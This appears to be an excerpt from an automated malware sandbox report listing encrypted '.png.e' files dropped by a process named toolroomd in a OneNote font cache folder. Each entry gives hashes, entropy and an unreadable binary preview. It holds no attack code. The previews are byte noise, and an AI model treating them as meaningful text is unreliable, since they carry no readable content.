Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aG.x..o.D..l8.[.y...._(.5.......AL.2.:v...../yk....95..n....{..6_..........c..L...aY.._\|4...\.DI...I..4v#..'....a.'....a.'....a._.$9....'./..j..t..L.8..\|..3A@..<o...@R"..E..!.j.r9..Oz?Jf.k....\.bC.E..".'bvn..9...P.}.b..uzrC.K.+.i....6.G.1.]..%..82.m..Se.....}..m..n.`2...r...U.Fv....?.....I..).J?....wz.....r....;W..1...e";..\|p.px..a....E.\|....>r...%.....\|m..`.OK.L?.Ps...(.`..CL...>..V.Ra 1...jH.@..............~\........;....o..`J.5.OZ{.=G_...0'.8........."......C\|3...k....(<&.3..)G}........6.....\...\|.=...S....x....EO6jP.E...6.ji.!...Z......<BM...V.IOI."..nD<......./..v.K...A./Uy..&..../...-..F.T..TDc............a;...=t.E..!.[0E6.(..m.....)..-,....H.....dz._)..R2.a..."E..:9S..Oy.MI..!...CO~S.\|2..c%8.(nSu..pj..wD.....tEs.p.:..........v........:.....%.......qVj>&..k<.{...p.q.......p.^.T....}..u.?..mF...V...}..O.zp:...9...;.!....1.. MWS.O.U:...;mK.TR..?.C..q...A..Uf

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MingLiURegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1282
Entropy (8bit):	7.394225336505138
Encrypted:	false
SSDEEP:	24:EcROR6bRPjPiXY2NaDYuVL69YJjUMuFJkFHh+bEYbu22sePc0m7:EcwKRbUZK9Jj4qJ8AYbQNpq
MD5:	2DCAB80C4CD3C5DB76DA8B6C240154A5
SHA1:	DFF6B01DF7A33D987A11DC35AD04061CDF86E0A8
SHA-256:	DA670464C95D6B38BD2D8C1D65B0E614D84A94677CFA8A25B9A9D2DD86FAEC2F
SHA-512:	ED9FB33E98D8A25EF00C668C0DEBC80F4F2D6BEE54BA11A6303CE1C7CEF3E98B03C713A8C49741056B74A57D04C9C3A1B623A136FC73F3797E80FDF7A987E859
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a......HA1.7......q.Jz..zy.l+........a....4O.fW......SO&1..F....O.m......;.~fd..j...:/%.J...a...2...8.;....0\|...#..!SMp...>.].~../...w.h.....]....../...g...R.~g....3....2.]..C...#qr../+0..+..m......C.v.8....<c.!f...oo.X\|.......UX.KX.{...]l.{9.\....a2.\..D+.u.m.4...&.X.z.8..,)...1kx..g?.)...7K....D^.a...uC. \|....v.."+H... .<.C..... .3..n4.K.iQcF...C...._......I.I.w.u....{.E%J...M....HDx...^.f.017.........l..oyk.2:I.....O...E..(.....d7...eD..U..^..U.&n......3[...@...o..b.d.-..G..(...2;.h(.t.%...g.F^...2.....bd.iT.+.!.S5....'A.WTs.O...h.~0.l..o....[..+....2..fb...(..W}<......r-b.!...'....H.8L.,..ls;).....'M.J...Y8W..8..w..n.?.vd.C....s;....J.......n.".Z...[................O'E...../Y.oh..._...Y.$..~..e2q.:.xm..A..!.J.D?..Q#... ....uj...4.A..\|...1.)...yaltv.NrF....!?..2 .;.0..&.1Bv....Tc..&.]Y....].l...i..i.S.......p>`.s.....P..aP.(& .....L...v"x...xs.L..*-..^...&....b.>b....B....................\....

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MingLiU_HKSCS-ExtBRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2378
Entropy (8bit):	7.729443455300384
Encrypted:	false
SSDEEP:	48:EwgW+hNCzHIdQD171ijXkDfUr3bCX+tEkdBHNpq:QCzSoRmXkDI+XQEkdBHu
MD5:	6BD8CD6FB3404D50FE0B98769FCBA646
SHA1:	9DDB542440EC2A380D1723D18B0AC6504A1C4AA9
SHA-256:	FEDEB647FAE7EC3B63AC270BB56D93DD143105254B3D5C22458C41D32B9772DB
SHA-512:	D4AC633E862998703563E5AB0A3A69A00ADAA1E893F191F3409D535196A4C42C9617B84EA4EA70E309705786CD4EFE757BAF4EBDBDDA24FA2553E14991855DA6
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aX....v.RU.>........8v..PM.Ex/...F-wn.....CX.....X..y`........0..g..,).......a.G.E.{...u...9.._$Y...1....y.K.c..._.^...._.^...._.^.l.E..Ay..Q._&...y..;;......j;.....u@.}$u....D..&Z.<......w.To.]..._..D....8..YU.....L.y.1...J.."...!....d.r/.....~.C.....JX..[~.~...I5)k..A.T..c/....[..s5.f.GV.n._.k....~HPX.>....$1..e>]+o5...f..f....l.'.V.y.5.....?.P2....f".-Y....R...y8.).hSo...;.v.].[.\|.)j.,....H....0.<\..(.5.m..!3..;\..)..Q`...V0ku-....I...!`.....oA.........N.V..TQ.I.6x9l.H.....X.q.....T..i.=....^...Jl/....3.!.... .Q.$/.@g.=_.B..UU. .m....rg.~Z'.F4..)9b...X...n.=.5.p......]...-..N`..........-5?%.~~6.c.C)........W.v....g.J...n.L$.g.'.1<.( X..d..1..C.^.F.s.......@..`c..p......]..yR^.....)...@E.2}.v~i..p..\|GVIC.....X.4#,..h9zyK....S...(....{....t..R.4.,..=.....nU}...~8EJ../d..$cl......A...TYi.`...].....Y3E.....F....P.F=d.....G.f..j.cN.F.GM..Bh.I.c5...&.>d5....;.Hz..]...n.B.p."...L..g.+.#.....:-.S.'

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MingLiU_HKSCSRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1954
Entropy (8bit):	7.643410430430734
Encrypted:	false
SSDEEP:	48:ESoRD/GnN2mz0Y7VL+e7vg1AhpwEt0jNpq:O/6wmAY7DIAhjEu
MD5:	EA948BFF7DB23F6502447D4906038781
SHA1:	E00F4D3F6A62CB5EE64487C6880052515B965044
SHA-256:	4EBB3F901778CBADEEF45232B111C9B8CEFCCADBDCCF77540264F39E9AEE1364
SHA-512:	615CB883E464EE45FCC87B7E46BBE83E7ECF69262E1AA3E6FAF28B9F92C78D946CAF164AD2509C5572D6B0BF510BB9897BB3AFA090A61D094E812EDDA1DF7159
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a~.W.L.P.....`.]C......#.m.Ty...c.\|x&.{&..8..<P....v..3%cT.v...@..X....z...D..Z$._.0..'}x7@.t\|ov]..!w.j..je. ...EI.u....EI.u....EI.u..k../..;.8q...._}..H......g.v3r..Y.Q.f..%.Hh.@@:..@.o.]..7e...B6......U.!.gW2..u.N..0..9..;.fIz.Z,ld..F..%.HD.n.....Q..."..'QVJ.2..\|hP...%..m..#e..a.IK..&l...-v.[-;......8.B....n...\......\...B.';..rS...+...5. .X.............V.... ..zyL.R..cZ/G1..;...k..,1o..O...Z....-.k.+....&....3L0.G.5o ....._.]AW.O..r..A.L!.v.]..+x..a.'go..c@....0.w.\....)5!L..O.BDB...m...o..4...F.P:H..>..u...4f}k..(t.].0I.%.7,T...(...R.j.j.......K..fz.w.~.[.S ....fa=..e..&...uA-.$.\|wGK...J\g.\v...a}..6.uxdk...m\...V.b.._..R../HA.@.....m..<.\lj.O0@e[?.........:..!Y>Q.....k...9.h.s............. ..6..^..-.4.M.........K..g..M...o6O..=..Oe..0L~..._!xn...Tj....(....K..d.h.S... y92..x.=.rr...I3)x.m#.L...aV...fj..W...F<Z.Z6.!.f.6.z...Y..=k.C.Z.e!v?...N...9..!.+...X...I.o. .pU.5L......gV..*.Q....euNZ

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MonacoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1202
Entropy (8bit):	7.355398096488138
Encrypted:	false
SSDEEP:	24:EpIItavBWBIpCna/m4Q9L/aEvUHNorH8lOFl82GrnQx7FzgsePc0m7:E2ItavBWBOCp9L9vEEIoCRrQxyNpq
MD5:	563DA423AC438ED64D9D5CC7C297A5A0
SHA1:	D2904B48C87E74E941E43A3EB8ED95D4E331D598
SHA-256:	A6913A3AC83C2E663B51B1C61AF68CB061A81D8391E7015796C558DE59D888FA
SHA-512:	C15A47ECFBC32E3FFB156BFD29247D658161A0A9201CCF897C164B92A0D2B298469F6FF45BFC429AD4AC87C1179E6277ADB66E43F0542AC7BBC77CCCFED8F7AE
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a97......>.hR..%...f....#R...g.._......08. .\(..-..vX..... .P.T.l.k.......RZ.H.Uh..d7..-.$x...S....$0j..............Z...R.n.C.v....?..BW6.43.\|......5.I.k.wG5....%.......W..].j1nU...".F...uw.}R.x&...S.O...j...z....H.T.#.......4U$.3......dw.D.\K.........M.ML.!...X..R.hu.~XfM...5.....0.]..o..X!.n.h.%...4........=hjXL.q..U..0\|...m,9;..TKb`...{..;...:V@1..s.....J..e.?.I#X.<#<...pt..R6}E...j...t.f................\.`<....'c.; .x.GK..0-...sjU.3[..n..1.>..t.zD#...8..,J.......B.c......N....8#^B..>..b.yP...Dt..E.Xa..P.c:/G.N.....P.... .p..W... It.+..Lh.$....:].t.........ET.T.Q....&...S.t.I.-0...~@9.O.3...^m.c....&s.....C0...C.....g.R_X.K.5....C{kE..._.....Q.....f{.cAO...S...I..=..[..56..'r...........o.....w...o.oM.w/...^mT....^..h....g.B_......f......%...%....l...QQuw..f...@..i.#..@....Y.).P........U..u..+..F....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Mongolian BaitiRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1810
Entropy (8bit):	7.604435728339808
Encrypted:	false
SSDEEP:	48:EBDPPuQ7kpDqwiZDL2j1CWmEF9Od/rYNpq:8PP5wiZDyhCe9e0u
MD5:	5A31E4E5583813A356EB0619252949D3
SHA1:	87301043F9A6DC623FAE7556990E59AB857DC037
SHA-256:	CA41D68C95B889794A9429278951B7EA21B43E156B370440FDA08A05D966C1D3
SHA-512:	BEC4DA93190B21020CEC9027E3812CD88F00257244166B7085E799383CF2EA322F235B8705B662678C79DD2BBCD04F66BF9B6B99316791EFCAA3659B614D8E8E
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a/.6L!.)C.8.9...."g..n...#.......6.`8..."m..0..>"....E]m.p..R5.H..L..}..N...Av..J....V......J..t2.m1...u<%.n.P.................................t....UWX.f.....p.."FL.......31.`=..$?ISO...........k4...4{).e....?....u...x:.x...{..F<..}........rC.n,....$..`...Q.G..N....1.!.HDpg/.<..!..<.L.......!=:0.-..H..m.R./..JO....~.X........nO.._i.}.....Q.....A!.O.w.a'm.(.x........+.....X...eLZ.....}w..@m.~..Cj\.....U....mw..F...-.....r+.....r\.....5...\|.n6...=.SC..<.hJtD..Y1.iVuh.V.....J.4#. ..hq.n........k,b.k.....!h8.S[.vk......3..M.qy...7.0.8.V....FK..n,t......TE...\|5..u~$dA.`3.._.j#..`;.}..#o.i}..`.7O..U..8Z..jv.=.J.B......_@N..4.j>.G.......B.[..../...z..3.-1.E.h.2.g.?}%..L.AS.l.Y..T.....y.]u.Q4.J@O-z..9..l.....R.i...."..C.2.z......(......y..,....s...9..\|'_s..\|.o..7.CO..7`.r.. .N...hb...).....w.@.).....6m.......9r.{...._..i.hOYF`....y+X=.3..f*B......a.T..a..0.....H..k..@........"X...!;i.5"r.~..E.rR..(

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Mshtakan BoldObliqueBold Italic.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2434
Entropy (8bit):	7.730289307974065
Encrypted:	false
SSDEEP:	48:E2zL0B8FjxBZ822wYLTlkHuPups3DR7tNv/0EOebmsjNpq:lwB8DBZ8KQguP6s3V7tNvQebmCu
MD5:	C15009B61AFE6ACDA26587ACD10739A5
SHA1:	AA36B30D66898310196426906C094D16DFEF03C5
SHA-256:	830C17668A1929E674E0E523641C5E9120CFE866F16AF724C31EC5BAEAB397D5
SHA-512:	BF8A1E85767742C8462D95526BA92CD655812FCF7D6C7415F23630520C91BD8BD8BCDBC8CBB4FEBE7C44E80D4F3CB44EE5A1E1CDC4A81B59E938BB3D7B8775DB
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...w......^.......<.:O....6...c......=...=.W..Sn .(Q.B.;.H{...Zi......I......-.:.N.d..z..c....2.3...S.J&CWb..>}.%a..H....lf...X..@.^\|..........0a...=..W...pJ.....6.j....5r/.\|Z...f.B.o64/..E._....$R.....R.{.>u/..V.P....>.t".wH.H..I..J:?...wV.S..."...Y.iP.......w.s...^....i..s...t..cp.&S:....9."...&...x&o;....[...w.F.............k......EN.l.6.p(.h...?...![......-.e$.....i..#N.......K+.7.5....F@...X..A........V..*p...KxI..".f.q.D.P...@-.nH.{........]n6.....m...@. .B.......L.....D.N..l+.b...._.....P."-}..X`......@........H..J.....v....>.%.)B......3.....(!..I.50......hr.:.j....I.k...l%..7s.....Na".W....P.dd..@\..w.~.(..).....pC3..'..Q.E...Xu.3.gd...x.X...5.sQ..D.:.L$AP...{A$F.(.l.........,.?].=}..f......Rw.)Wa....\|....W....i\W..=...J..RiiSv..D.."...5.j.]..4.A\|0.X..H.,B.........Mi...$2...t.O.....VB.W>..[A.p.......ySR.1'...oA.xt.K.p.Hw......gX;O..Mf,-.+.Y..[..]....Q+....s,d....f]

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MshtakanRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1346
Entropy (8bit):	7.446686881287185
Encrypted:	false
SSDEEP:	24:ElfFMbV2ip7Tsh5yA1DiiJvK9K3rQ3f5Msxl94JfmcsePc0m7:El1iNsDyA0A/sMOBcNpq
MD5:	7AAE939A35FA2E5710EAFE7E964636C1
SHA1:	11D2890AE1396F687EF0A1346AC6AF4A2E55F783
SHA-256:	A67698B5F88CE0648CCCDD50C31B483C507F15E922C1B303C097AF5BEAC7FADE
SHA-512:	A11F7B03C42EFB125B683707EBD8C46E1AC5B6E02E27759A1FA1E83B1E3F0D0838CC896A31FB19074BDD5E6C74DD695D65D2FAB48B80A7D5F7FCE1E9D214B6D0
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a3.%..G.,.r.'w.#.{....w....6.H.$h.i.k......F......s..O]]..32..<...z......b.z.....G......#,jiSg..\|..)......uFh#..9.....ol!b.8.Q.......lJ..X.1.!..O')(....g..T.jbT...(.=..guO..%....X0..~\|.AGV.....E.Nn..V+....M..yV..}.j-..S.q/.].........=...f.. r{.cH...'.w?.G-. ..P..G...-,...,f&.S5.6.......+\|.....y+".Z..B....b..E..6G.}.....{.I.....t_..(..._.....b..#F3..q..F.d....U...D.D. +D.]5./....V.v..%.J@..3?..:..#_S..'...%i..Gs.Y.B..~.....].....=.>..@..\E.C......`..7.....y......~0..no_r.\s..m$.a..F...D.`+.....d3.r.$....Z.0w.C.......pp..\|'.k.2.T./........#>..`.../.}#eB.U.......j.t.....g..I.W2_<.p.9O...3.......k......5....!...dp...q.\|w.......JC5.h..Mm..M...d..ssY;..m{.d...'&^."}6..e..+.7/c...L[._..]....."..:....b...)MFRh.&..4..B~k....@.....D\|n.#...fA........j0d.%..=..]..P..K.Z...p...F.X....m....%..."...d.#%..=."`....QBO...B..b.......=..ID....{...<.x...\OuW.V.P.t..3.6F..].C..ac....k....`?..w...pL/.>..D..{

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.New Peninim MTRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1602
Entropy (8bit):	7.551007211578133
Encrypted:	false
SSDEEP:	24:EWa4mVeo/v5F62GydkVkv/BfmIR5TksO5guWJ9ZElyluodpkJ0IYVESjsePc0m7:EJso/vvGgkV6BftR578gZEeCuI5KNpq
MD5:	FBF204642AA9EA07370844065708E903
SHA1:	A28D737335144656DB80E8C594594F363A5880B4
SHA-256:	7D64CAC1F163715B34F342A1E23C7400BE743A814750A051E8D9733C11CDF23F
SHA-512:	682BAAC50C4C0A2AB4372FA8FE7B4BF861CDFF8601EB6F8300906691F94F4F026FC5E1754C6FC7A12D4EE5A56445A766A8C2DBE8C806350BCB5B5EC49DC1C29C
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.Jc..B..!..N..H.sbb.[..m..O...i.._.. tek....\|..3'V.....^..G.....~.....{.2%...............MN....J.L.-.y.N; .qc..+#f... .M.7z'R..Y..\S..j.....j......c.\|-.E..!.j.d.M.P$....m....w.L...A......p........"..K-..L..&X.,.<..9.z[xS^B.\|.}.!.`%...gN..j..U..L.......5.....@{&.0...Os^......G..6..k......ePf....j...[[.94H......k...eT4...m.....h...;..T8.(...s.....#.U..j.\nL..u...m...c].3.B...1=.`u.).....n....4>.......1n..<9. ..K.>.+:.<I^........xe..".]....(A..Ws$7.(T......P.].Y....;rJ...>....o........:......g.=...:$...E.F..:1...m\|..O^Q.=.6_.G........dbX..q......?..I.\|...s.R%U.[R.(.!.....s$..c.k\...,,kku$..U.XhMB.......F..g...k .......8...8..........{,..#..[..@....4....r....f.p.Ub..5.....V.W.7(..kiQ....<.?>.,...'fh.].....z....7B...{@.^....}h..!Qu..Og...'=.H.?0.;+Am...G#n.j*1.5O.jv..yH...?......:.,\|...O...)+...s.....=.`P..e.g..1.....\!.P.._......yh..j..n.>h.O.E.n..m. C..Z..d...,..k.0.n..U..\..Y_.....6....

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Nirmala UIRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1234
Entropy (8bit):	7.3527604846872885
Encrypted:	false
SSDEEP:	24:EKSoOPwU7E7Io6WL2BARZtvWRpW6oyemZnR08VVrbpHsePc0m7:E5obUw7I+L7PoTWWznRRZ9HNpq
MD5:	D99E93860C3D28B6235E4E2360D7CD33
SHA1:	F7C60720B60B3BF333CFC964081C428931BCBC18
SHA-256:	CC4D8730D8EEB6E97E9A800F18412F2C842966596E2BB74C5AC8E1AF8F58E046
SHA-512:	6BBDB3FB5F557249CBF1748FB8DB16365A34E8D99DE1103F1A11D4BF4B1D752C7740364C92A89E7E03E4EC3BF8A77C580B0F7134A6EAF8041091D5988F6DB9E8
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.$........P&.~..T.O..IV....s1f...V.....h.5p.+..nWt...]z.!H..u4.+..]#.K..h...YZ#.H.t.8."..)^........l.....l..gP.!B..`.F .A.Y.[....=L...\x.j.6...L..[$s..>...Y.......y...-f......+h.oM..CgZ.....p.Qwl1..~.6.j....>.E&.. .Jq.......Q...] .3.......W.z.....\<M..SU.=......p.M`..6g...A)9./..\.......I.y....\.E...-.Lax;...#.P.8...%....S.-.....{..zm..!..<dj..?.,5G. .Z..rF.o.....Q.B b.Y....T...rp.'.d...Et..D.Y..J..G8.F.....eWf....i.:..V..s.v..c....0).R...l......c...qC..q..G.y.`.^....iV..:....R.V.sb..!.z`.ym......E.p...\....weU ...,....)Mwea...k..".eB.b..V...3.GA.......}.L.iU.....J.4.t@>;.<g<...Z....E.{w..U.w..U...V.....B5......oQ.y.-.#.j.o..I.t...4..T.Hq.3zQw.....F^.p.E...42....,..G..r.:......".I<....{qE..iZ........._#g>.:W.W..XZq..b5....t.-..+;.(.....n".O.$Yw.5/\hD.....-}.N.\!.PG.uK.1o&.N.......6tZ....d..<B+I..=3.@..U\.B1...:n.FT...a.O...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.NoteworthyLight.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1338
Entropy (8bit):	7.451018082013623
Encrypted:	false
SSDEEP:	24:EViYV1hBaP/knbFftwm3/B8FRnP4GBzCkQeBNyhWf2r2NKusePc0m7:EVi6h0P/kbbp8TTBzDQeqAf2ipNpq
MD5:	6D8EB1F4258909B8D2FFFF3C01E17EE0
SHA1:	2BA1DE9EA817795D9E314077B7D0C124010C7741
SHA-256:	E1669B97BAD59D52F9FF8062A6B47FF39A04901D00DEA3AB8BDE21C5E9C774FA
SHA-512:	5B91E76536BB25C499407CB7CF3E58A80226F717883FF99527F13BE7097EC93CCB996A776FE58B7ECE6A742DE2A26BD39EAB7126F61D9BC62E8BEF60E0073AB7
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a`...P..>..N{.9kP:......e..O....{...........7.....w[...!...y.i..-..5.P.,..m...&\|?.....2...q3M......F~.1N...^...d.X6.IU ...1...2+../.....2/@C..C<}B....8.]..?.k.GE.............u..)....J..C-=F........q.2.&\|...m...iq.TtJ..o/.......a....vp.8...H.H.p........9....R..\|.K.P.7Ij...."Za..1..;.o6../.p.(....b,C.'.._....s.......r^x.].V..&.2.q@..8/.~UdN"5..A..r....X.?.d`.m....t..#.....k$..:...\|...(b.....D{..G".D.S.......{..^..P(rT..x.8.O{.l .v..n.S.FB%.wv.._...L}..pp.m......Lc.g.6_.pl.LM.G......A.h....fMo.5.W...C...n..S.W..."?N..F.:......)..u....X.`z.....a.(....E\|.wo.\...6.'.+..\|....{.c.....n .y.<....S.........<...x.p"B1..G-UE.J...}.....i.K?e...W"+.Ag?.p..E.u(.Q..2.-(.AL..^!.w..H..[.:V..&.B.'....`...$.K.,....yf..?8...,.x.ycA..QY..~....J.U.S...UW+..De..r.b...Yb.O]n4"..).....r....k.K.s...d.\|..Hh..[k.94..........Cc7.gZ...v.;a.g................:.]..iz...,$.j.u..&.}!..1#..:...(h,..7....T..`.`..s+.ss8..$.Y9..\.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Noto Nastaliq UrduRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2114
Entropy (8bit):	7.680202114100809
Encrypted:	false
SSDEEP:	48:xSnWSQWiEq697BxOF1U6IfvGxIoSN/FcNpq:EWsiEr97jOF1URVomcu
MD5:	69AF96AA6FF327071C31FA6AF641930D
SHA1:	BF85D974A9A1569DFEEA64D6894705D48591234F
SHA-256:	BC51550F6808E1ECDE50C5DEA6DD720ED3AE60366A37E4177C3F9E07AE232875
SHA-512:	A2CE3BC6AD29883B21E31DD21F4D59DB9381D6BAA6257F13E58AF45CF166D5018DCBD41AE3BB546C071851EC3619C45688C6B8ABDA195035AD28267986CB4F53
Malicious:	false
Preview:	.<.\|.....f.A.....;HS<9<...1FZdU.x..Q.B.i .Y.a...[...4....t.?q.F....+D.@Q.".h.......F...X.:\.]...L....^.m\|.A.......7.x.3.}.....1u..(....Y..>......[.nr..T.h.....Vf....)...Hz^.......v.dUh..u.....t.L..y>8.h.<......Vf....Z.J6.q'.^...jST.....u..S.59'..../..z.N.,.~...........;.k..\|....3.0.{].p....Y.-.5s..k..!.T...y(=`..U......?Uvt..kA..n....w. .......G.32.~/.2.`.".Q.,..@.G.j]...;.`k.z.....z.l;B.=8lz.k.1.d...1c.".I9..#Ot.......Y.q.(..8uN.....&S.....[.c..g...n:.%.#.!+.`o...t....:..^p.[.....13..jz...%.._m......K.7Ze...r~..Ov.IpC$.CQ..X._e.......... ...\|..p.5.L..D..o.........\...........n.Du.......Qc.....].e4...Tu...p.....D[65.W...H....L........jH..3=.P)].:bB.VRY..z.-...!."`Vg.@.......X.._..v...^...(.)}".m..<.}........d.[.`...<.RR..............[..7...N..;2...XW;Ts...~...u...~.y.....)5S.zaR.O...u.........B.c..\Z..C..y..3....!..8.#...d.....S......x+.].ZL..n:.-...7..].......C..\z........1.0..+M.;.v.CgUB.2%.e\|.....l...I....y....W.k&..F&3...t....

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.OneNote Apple IconsRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2154
Entropy (8bit):	7.686082922579116
Encrypted:	false
SSDEEP:	48:EUsEoGoNgola1VHrnuRoLIXIHQ0sPjDANpq:7Qjgua1h3LIsQj4u
MD5:	E87608C24F8CDEE46C603BE7F5013EEB
SHA1:	44C5133D6B45AC1B111DD015590B51B2B35704C7
SHA-256:	9D2DC25419518AB7F418CE3D756F6509D42846AFC2C966D50DC58754B504622E
SHA-512:	71351A7DC712C8163DF424ADA2C82BF2DC149E387C848D20F779FE9ABBCB89C01A1BE0BFDF8D16B9443DAC26AE738EA8BF7C2349BCE7BE3EC64870890C316B19
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.ay.,$H.'....`.].g...7..D.H.K;.......=AH'..Y..9.(rq..?....J......6.(..R....(...?P...r....m...hr.+T....g.+T....g.+T....g......6.H...Eqg+h.:....%.x(..2.G98.yL..R}...........B......3.Ix..P...J...P...{.....wI....~....}.-:t.&....AG....:..O....FA<..4.az~a...IY[.......q}......Y....b.&......Z).a]..dS..dX.-.O..h.g...@...3.l.X.P..?...f.z..;.5.....?lr.c...F..E.vA?OiW.YR...'..D.....\..){...J..........<.HX.....6R2.(.u.$+.....d.=....a.q...<.m.....T^v.....#.. >T-.c.(.....l...(.s~..^....%......V.r..yM..6K...lN...I. ...D..z.c....2.V...1roY..J.W..D..Z+B.<.....7.bd}.!..z...`..\)a..j.Li!A..L.......w....K~ ..]...........'....,./?WTd[.b..lq.....Zm.....~T..5.v.K...>#.dF...3.......t..)I".....j......L._Q}Rl..\|....>.[...<.DgrCW..l.=...............,1.~......b.......L'......;.....t......T.I..[G.._.c....\|G....&sk........yT-....Z..m.}.Z!@......{/..Q...... v.sy...{Z.$E.^..$......\k.j....To..zm7...;^\....P...d..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.OptimaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1242
Entropy (8bit):	7.344339940441877
Encrypted:	false
SSDEEP:	24:E3cMswLP7V2wINvY3tSQ3JaW2kCv3Qt7Rv9GOXJDSpLS7QwsePc0m7:E3Hs8JGNvY3RnHdVuOXJW4ZNpq
MD5:	28688613B0C390FC59C4BCFE92200F28
SHA1:	A4C37ACF8DDDD8487A0E9DEB50D64431AD5E7748
SHA-256:	097D92AE6CB1D0552C4ADA01871B1AED04A8DBEF68962D08936AEE0CD714C4CC
SHA-512:	D4E2F0D8FA3E6811904A56020F8090B4C566D24542A1523210AF5562D05BCB8086657387498AF5A7CD0FD6CF26489C1BD1FF6542E905B79856E45A4EBD04D30B
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aJ+B@... .1h....a......A..b0MF.)02...pxTt.b.K....S...@1..n."g.X..j..]..1...IY!......?...rR.+hx.E$....Y..H...\.e8...\.....W.9.a...)..L.%]_.C.)6?R....s.j..:d....\Y.i.D..4V....+...LA.....htK<......'&......1b\|^..x..U..F'.\.Y.&..y!89.@K..!.l....A'.\|.eJ...}....O...'.I...>2...k..[.o...J..>.Is=]E:@B...Jw+.....g...%.(9;..{......Mu.d!<J` .....,..7....@....g=..s...L.u."..W.oK.j/.rW...'m@`..RK3.!...^-.t....[."\..m....i..]...%.]...9kZb....R...:..)..!.o2{2.2kvh.......R...$.....C`.....r..n..k.n....\|.....C&B.T....I\....^... ..Zz....;....E.p..6.....x1....)..-..`..x&...^xdc@M.$.v)%..e..p8\|.~F5I.W..4$....h..?.........}nX4$.<L....:.J!...>".q..%.kl..<..q.(..=...8?...}e.P...)8.........^Ne%....2..0.b..J..p.d..Y...;.Z.=..^g..Z.?..N.wj.....]..DD:.+.:....QY.9..t@<f..,3.......S...A...et&ytfO..o.. .>tj.. 4....1.b._.'.....!]FK....H.;J.....U\|Zg#\|...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Oriya MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1394
Entropy (8bit):	7.44779995857006
Encrypted:	false
SSDEEP:	24:EA/t9+uENyDzs8UhWXSXwwLnY3f9NvuTIZyOxjSId6Oz5GcMFp2MY2HmsePc0m7:EAScDzsdhzAInYrvvZS+6OzEcYp2zNpq
MD5:	4482DC881F3DF1117317E834B548DAF2
SHA1:	11720E54D1FEE885B1D83D179458EA6C5103BDA3
SHA-256:	9AA96C959A2D1D700DCB0F41A0A0E62B1EA3C85ADD9C04CEA3F3BE1CEDE3D251
